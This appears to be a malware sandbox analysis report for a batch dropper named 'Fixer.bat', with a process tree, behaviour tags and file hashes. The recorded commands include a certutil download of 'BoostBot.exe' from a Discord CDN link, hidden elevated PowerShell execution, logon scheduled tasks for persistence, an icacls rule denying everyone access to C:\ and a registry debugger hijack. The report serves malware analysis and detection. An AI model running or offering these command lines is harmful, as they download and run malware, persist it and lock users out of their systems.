-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:2916
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵PID:3108
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3280
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fixer.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\system32\certutil.execertutil -urlcache -split -f "https://cdn.discordapp.com/attachments/1237881664131174481/1239282786335064204/BoostBot.exe?ex=66425b89&is=66410a09&hm=76121e524db94e51397af0fa52812c443a6cb5a194da52bb2909deb394f90aee&" BoostBot.exe3⤵PID:3848
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Process -FilePath 'BoostBot.exe' -Verb RunAs"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3452 -
C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe" /rl HIGHEST /f5⤵
- Creates scheduled task(s)
PID:1164 -
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
PID:2928 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"5⤵
- Executes dropped EXE
PID:1344 -
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77BoostBot.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\BoostBot.exe'" /sc onlogon /rl HIGHEST5⤵
- Creates scheduled task(s)
PID:3820 -
C:\Windows\system32\icacls.exeicacls "C:\" /deny *S-1-1-0:(OI)(CI)F /T3⤵
- Modifies file permissions
PID:2804 -
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Executable File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f3⤵PID:4188
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\Fixer.bat"3⤵
- Views/modifies file attributes
PID:2392
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3832
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4024
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:4684
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵PID:3272
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2324
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:2136
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4108
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵PID:1508
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵PID:4824
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5104
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
409KB
MD5404ab800bbe49c36bd64d0d73600b59a
SHA14c8dff2702fada108f7477ad357067310b584366
SHA2565465f02f24ee5c1fc9c9c27c86c209eeddc2ed607143e1b76ca9c9d9b7b84154
SHA512d0ecd88adfd84d9d8e845281e0437368aadf3d1d6fb704d7c7630d1360697471c2a49584f968eeebd5b435f11af9ce3d06327f1835fa5d07a140f22c0f95fc11
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4